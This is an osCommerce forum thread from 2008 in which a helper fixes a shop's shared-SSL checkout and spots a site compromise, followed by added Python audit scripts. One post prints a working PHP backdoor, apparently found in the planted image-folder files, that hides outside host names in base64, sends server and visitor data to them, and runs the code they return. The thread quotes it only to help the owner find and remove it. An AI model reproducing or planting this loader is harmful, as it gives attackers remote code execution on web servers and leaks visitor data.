tropiland
Posted May 25, 2008

Hello to all,

I have a Shared SSL through my webhosting provider that looks like https://mydomain.c4.mywebhostdomain.com. I tried to integrate my osCommerce shopping cart so it will operate under this SSL by going to my /catalog/includes/configure.php and putting the HTTP server and HTTPS server as follows:

```php
<?php
/*
  $Id: configure.php,v 1.14 2003/07/09 01:15:48 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

// Define the webserver and path parameters
// * DIR_FS_* = Filesystem directories (local/physical)
// * DIR_WS_* = Webserver directories (virtual/URL)
define('HTTP_SERVER', 'http://mydomain.com'); // eg, http://localhost - should not be empty for productive servers
define('HTTPS_SERVER', 'https://mydomain.c4.mywebhostingdomain.com'); // eg, https://localhost - should not be empty for productive servers
define('ENABLE_SSL', true); // secure webserver for checkout procedure?
// .......the rest of the file.....
```

However, when I tried my shopping cart, it does not switch to the HTTPS server at check-out. What have I done wrong? How can I set up my shopping cart for HTTPS checkout?

Thank you in advance for your time and consideration.

Dimitri "El Greco" Svolos

germ
Posted May 26, 2008

Many times with shared SSL you have to make an edit to your /includes/application_top.php around line 40:

```php
// set the type of request (secure or not)
$request_type = (getenv('HTTPS') == 'on') ? 'SSL' : 'NONSSL';
```

That code usually doesn't work with shared SSL, but there are ways to find something that does work.

But you'll have to post or PM me your URL before I can be much assistance.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >

tropiland
Posted May 26, 2008

URLs sent to your inbox.

germ
Posted May 26, 2008

Examining things now.

osC is recognizing the SSL when you force it in the URL. That's good.

Look on your site for this file: /catalog/includes/local/configure.php

If it exists, be sure the data in it is correct. It may have a line like this:

```php
define('ENABLE_SSL', 0);
```

You'll need to change it to:

```php
define('ENABLE_SSL', 1);
```

Let me know what you find out.

germ
Posted May 26, 2008

You have some items in your /catalog/includes/footer.php causing the "non secure items" popup when viewing the site in IE (Firefox is OK).

First, make a backup of /catalog/includes/footer.php

Then, in it find this code:

```html
<!-- Start of StatCounter Code -->
```

Replace it with this code:

```php
<?php
if ( $request_type != 'SSL' ) {
?>
<!-- Start of StatCounter Code -->
```

A little farther down in the code, find this:

```html
<!-- End Google Analytics Code -->
```

Replace it with:

```php
<!-- End Google Analytics Code -->
<?php
}
?>
```

germ
Posted May 26, 2008

And I think your site has been hacked.

I'd bet your /catalog/images folder permissions are at 777

Take a peek at all these files. I think you'll find them something you don't want:

```
Index of /catalog/images
Name          Last modified       Size  Description
0235947.php   24-May-2008 06:57   1k
235947.php    17-Apr-2008 16:29   1k

Index of /catalog/images/Eemax Tankless
Name          Last modified       Size  Description
168705.php    17-Apr-2008 16:29   1k

Index of /catalog/images/Stiebel Eltron Tankless
Name          Last modified       Size  Description
212605.php    17-Apr-2008 16:29   1k

Index of /catalog/images/Temporary
Name          Last modified       Size  Description
212380.php    17-Apr-2008 16:29   1k

Index of /catalog/images/Titan Tankless
Name          Last modified       Size  Description
89190.php     17-Apr-2008 16:29   1k

Index of /catalog/images/Warmrails
Name          Last modified       Size  Description
56899.php     17-Apr-2008 16:29   1k

Index of /catalog/images/Water Ionizers
Name          Last modified       Size  Description
171625.php    17-Apr-2008 16:29   1k

Index of /catalog/images/banners
Name          Last modified       Size  Description
84119.php     17-Apr-2008 16:29   1k

Index of /catalog/images/default
Name          Last modified       Size  Description
85574.php     17-Apr-2008 16:29   1k

Index of /catalog/images/gt_interactive
Name          Last modified       Size  Description
179503.php    17-Apr-2008 16:29   1k

Index of /catalog/images/hewlett_packard
Name          Last modified       Size  Description
20438.php     17-Apr-2008 16:29   1k

Index of /catalog/images/icons
Name          Last modified       Size  Description
0209592.php   24-May-2008 01:18   1k
209592.php    17-Apr-2008 16:29   1k

Index of /catalog/images/infobox
Name          Last modified       Size  Description
113644.php    17-Apr-2008 16:29   1k

Index of /catalog/images/mail
Name          Last modified       Size  Description
070344.php    24-May-2008 02:27   1k
70344.php     17-Apr-2008 16:29   1k

Index of /catalog/images/matrox
Name          Last modified       Size  Description
107656.php    17-Apr-2008 16:29   1k

Index of /catalog/images/microsoft
Name          Last modified       Size  Description
231783.php    17-Apr-2008 16:29   1k

Index of /catalog/images/sierra
Name          Last modified       Size  Description
71286.php     17-Apr-2008 16:29   1k
```

You need to set your folders to 755 permissions.

If you have a /backups folder in your admin it probably has bad files in it as well.

tropiland
Posted June 1, 2008

Thank you for all your help. Yes we've been hacked and, since then, reset the permissions to 755. I checked my configure.php file and, I think it is OK. However, my customers still do not enter the HTTPS when checking out. I am putting both catalog/includes/configure.php and admin/includes/configure.php for your review. Am I missing something here?

catalog/includes/configure.php:

```php
<?php
/*
  $Id: configure.php,v 1.14 2003/07/09 01:15:48 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

// Define the webserver and path parameters
// * DIR_FS_* = Filesystem directories (local/physical)
// * DIR_WS_* = Webserver directories (virtual/URL)
define('HTTP_SERVER', 'http://www.e-smartliving.com'); // eg, http://localhost - should not be empty for productive servers
define('HTTPS_SERVER', 'https://e-smartliving.c4.ixwebhosting.com'); // eg, https://localhost - should not be empty for productive servers
define('ENABLE_SSL', 1); // secure webserver for checkout procedure?
define('HTTP_COOKIE_DOMAIN', 'www.e-smartliving.com');
define('HTTPS_COOKIE_DOMAIN', 'e-smartliving.c4.ixwebhosting.com');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/catalog/');
define('DIR_WS_HTTPS_CATALOG', '/catalog/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');

define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');

// define our database connection
define('DB_SERVER', ''); // eg, localhost - should not be empty for productive servers
define('DB_SERVER_USERNAME', '');
define('DB_SERVER_PASSWORD', '');
define('DB_DATABASE', 'osCommerce');
define('USE_PCONNECT', 'false'); // use persistent connections?
define('STORE_SESSIONS', ''); // leave empty '' for default handler or set to 'mysql'
define('FEATURED_PRODUCTS_DISPLAY', false)
?>
```

admin/includes/configure.php:

```php
<?php
/*
  $Id: configure.php,v 1.14 2003/02/21 16:55:24 dgw_ Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2002 osCommerce

  Released under the GNU General Public License
*/

// define our webserver variables
// FS = Filesystem (physical)
// WS = Webserver (virtual)
define('HTTP_SERVER', 'http://ww.e-smartliving.com'); // eg, http://localhost or - https://localhost should not be NULL for productive servers
define('HTTP_CATALOG_SERVER', 'http://www.e-smartliving.com');
define('HTTPS_CATALOG_SERVER', 'https://e-smartliving.c4.ixwebhosting.com');
define('ENABLE_SSL_CATALOG', 1); // secure webserver for catalog module
define('DIR_FS_DOCUMENT_ROOT', $DOCUMENT_ROOT); // where your pages are located on the server. if $DOCUMENT_ROOT doesnt suit you, replace with your local path. (eg, /usr/local/apache/htdocs)
define('DIR_WS_ADMIN', '/admin/');
define('DIR_FS_ADMIN', DIR_FS_DOCUMENT_ROOT . DIR_WS_ADMIN);
define('DIR_WS_CATALOG', '/catalog/');
define('DIR_FS_CATALOG', DIR_FS_DOCUMENT_ROOT . DIR_WS_CATALOG);
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_CATALOG_IMAGES', DIR_WS_CATALOG . 'images/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_CATALOG_LANGUAGES', DIR_WS_CATALOG . 'includes/languages/');
define('DIR_FS_CATALOG_LANGUAGES', DIR_FS_CATALOG . 'includes/languages/');
define('DIR_FS_CATALOG_IMAGES', DIR_FS_CATALOG . 'images/');
define('DIR_FS_CATALOG_MODULES', DIR_FS_CATALOG . 'includes/modules/');
define('DIR_FS_BACKUP', DIR_FS_ADMIN . 'backups/');

// define our database connection
define('DB_SERVER', '');
define('DB_SERVER_USERNAME', 'mysql');
define('DB_SERVER_PASSWORD', '');
define('DB_DATABASE', 'osCommerce');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', '');
?>
```

Thanx!

germ
Posted June 1, 2008

What did you find out here?

Click Me

:unsure:

germ
Posted June 1, 2008

And you've still got a lot of those rogue PHP files in your images folder, looks to me like.

They probably have data in them that looks a lot like this:

```php
<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
?>
```

You should probably remove them if they are not something you put there or recognize.
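
Added example, not part of the original thread and not osCommerce code: a small audit of an image tree for the two conditions described in the posts above, world-writable directories and PHP files sitting where only images belong, with content checks taken from the loader quoted in the post. The function names, the extension list and the sample tree are assumptions made for this illustration; the sample file is constructed and holds no real host.

```python
import os
import re
import stat
import tempfile

# Extensions a web server commonly hands to the PHP interpreter (assumed set).
SCRIPT_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

# Byte patterns taken from the loader quoted in the thread.
LOADER_PATTERNS = {
    "include-of-decoded-url": re.compile(
        rb"(?:include|require)(?:_once)?\s*\(\s*base64_decode", re.I),
    "eval-of-fetched-content": re.compile(
        rb"eval\s*\(\s*file_get_contents", re.I),
    "errors-silenced": re.compile(rb"error_reporting\s*\(\s*0\s*\)", re.I),
}


def audit_image_tree(root):
    """Return sorted (relative_path, finding) tuples for an image/upload tree."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        # A directory any local account can write to (the 777 case).
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append((os.path.relpath(dirpath, root),
                             "world-writable directory"))
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            findings.append((rel, "script in image directory"))
            try:
                with open(path, "rb") as fh:
                    body = fh.read(65536)  # the files in the thread were ~1k
            except OSError:
                findings.append((rel, "unreadable"))
                continue
            for label, pattern in LOADER_PATTERNS.items():
                if pattern.search(body):
                    findings.append((rel, label))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample: one clean image, one loader stub, one 777 folder."""
    sub = os.path.join(root, "Warmrails")
    os.makedirs(sub)
    with open(os.path.join(root, "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a")
    with open(os.path.join(sub, "56899.php"), "wb") as fh:
        fh.write(b'<? error_reporting(0); '
                 b'include(base64_decode("Y29uc3RydWN0ZWQ=")."/?".$str); ?>')
    os.chmod(root, 0o755)
    os.chmod(sub, 0o777)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, finding in audit_image_tree(tmp):
            print(f"{finding:28} {rel}")
```

Run against a copy of the live images folder, every reported script path is a candidate for removal after review, and every world-writable directory is a candidate for the 755 reset mentioned in the thread.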

germ
Posted June 1, 2008

If the /catalog/includes/local/configure.php file isn't there, please do this:

Copy the text in the CODE box below into a text editor (Notepad) on your PC:

```php
<?php
echo 'HTTP HOST: ' . "$HTTP_HOST";
echo '<br>Server Port: ' . getenv('SERVER_PORT');
echo '<br>SSL Status: ' . getenv('HTTPS');
echo '<br>Fowarded Server: ' . getenv('HTTP_X_FORWARDED_SERVER');
echo '<br>Fowarded Host: ' . getenv('HTTP_X_FORWARDED_HOST');
echo '<br>Fowarded By: ' . getenv('HTTP_X_FORWARDED_BY');
?>
```

Save it as myenv.php

Upload it into your /catalog folder on your server.

Then, access it using this link: <-- VERY IMPORTANT!!!

Click Me

It will output some text to your browser.

Copy/paste that output into your next post.

tropiland
Posted June 1, 2008

As per your instructions, here is the output text generated:

```
HTTP HOST: e-smartliving.c4.ixwebhosting.com
Server Port: 443
SSL Status: on
Fowarded Server:
Fowarded Host:
Fowarded By:
```

germ
Posted June 1, 2008

And this file doesn't exist: /catalog/includes/local/configure.php ?

:unsure:

Everything looks like it should work.

tropiland
Posted June 2, 2008

It does exist and here is what it looks like:

```php
<?
define('HTTP_SERVER', 'http://e-smartliving.com');
define('DIR_FS_DOCUMENT_ROOT', '/hsphere/local/home/tropilan/e-smartliving.com/');
define('DIR_FS_LOGS', '/hsphere/local/home/tropilan/logs/e-smartliving.com');
define('ENABLE_SSL', 0);

// define our database connection
define('DB_SERVER', 'mysql37.ixwebhosting.com');
define('DB_SERVER_USERNAME', 'xxxxxxx');
define('DB_SERVER_PASSWORD', 'xxxxxxx');
define('DB_DATABASE', 'tropila_esl');
define('CONFIGURE_STATUS_COMPLETED', 1);
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
```

I xxxed password and user name for obvious reasons.

germ
Posted June 2, 2008

That's the problem.

This:

```php
define('ENABLE_SSL', 0);
```

Needs to be:

```php
define('ENABLE_SSL', 1);
```

You should pay closer attention. I've asked you to check for this several times now.
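
Added example, not part of the original thread and not osCommerce code: a check for the failure diagnosed above, where a second configure file silently overrides a security setting. It relies on PHP's define() keeping the first value given for a constant, and it assumes the store loads includes/local/configure.php before includes/configure.php; the function names are made up for this illustration and the two inputs are abridged from the files posted in the thread.

```python
import re

# Matches define('NAME', value); and keeps the value as raw PHP source text.
DEFINE_RE = re.compile(
    r"""define\(\s*(['"])(?P<name>\w+)\1\s*,\s*(?P<value>[^;]*?)\s*\)\s*;""")

# Abridged from the two files posted in the thread.
LOCAL_CONFIGURE = """<?
define('HTTP_SERVER', 'http://e-smartliving.com');
define('ENABLE_SSL', 0);
define('STORE_SESSIONS', 'mysql');
?>"""

MAIN_CONFIGURE = """<?php
// define('ENABLE_SSL', false);  (constructed commented-out line, ignored)
define('HTTP_SERVER', 'http://www.e-smartliving.com'); // eg, http://localhost
define('HTTPS_SERVER', 'https://e-smartliving.c4.ixwebhosting.com');
define('ENABLE_SSL', 1); // secure webserver for checkout procedure?
?>"""


def strip_comments(php):
    """Drop /* */ blocks and whole-line // or # comments (not trailing ones)."""
    php = re.sub(r"/\*.*?\*/", "", php, flags=re.S)
    return re.sub(r"(?m)^\s*(?://|#).*$", "", php)


def effective_constants(files):
    """files: (label, php_source) pairs in load order.

    Returns (effective, shadowed). effective maps a constant to the
    (value, label) that wins; shadowed lists every later define() whose
    differing value PHP ignores.
    """
    effective, shadowed = {}, []
    for label, source in files:
        for match in DEFINE_RE.finditer(strip_comments(source)):
            name, value = match.group("name"), match.group("value")
            if name not in effective:
                effective[name] = (value, label)
            elif effective[name][0] != value:
                shadowed.append((name, effective[name], (value, label)))
    return effective, shadowed


def ssl_enabled(effective):
    """True when the winning ENABLE_SSL value switches checkout to HTTPS."""
    value, _label = effective.get("ENABLE_SSL", ("false", None))
    return value.strip("'\"").lower() in {"1", "true"}


if __name__ == "__main__":
    order = [("includes/local/configure.php", LOCAL_CONFIGURE),
             ("includes/configure.php", MAIN_CONFIGURE)]
    effective, shadowed = effective_constants(order)
    print("ENABLE_SSL in effect:", effective["ENABLE_SSL"])
    for name, winner, loser in shadowed:
        print(f"{name}: {winner[1]} = {winner[0]} overrides "
              f"{loser[1]} = {loser[0]}")
```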

tropiland
Posted June 2, 2008

Ooops! Corrected it! Thought I had done it!

tropiland
Posted June 2, 2008

It works now! Thank you so much for your patience and consideration.

germ
Posted June 2, 2008

No problem. ;)

You still have "hack" PHP files in your images folder, I believe:

```
Index of /catalog/images/Warmrails
Name              Last modified       Size  Description
Parent Directory  01-Jun-2008 18:12   -
56899.php         17-Apr-2008 16:29   1k
```

That's just one example. There are more in other subfolders.

Check all the subfolders in your images folder.

tropiland
Posted June 2, 2008

Will sure do!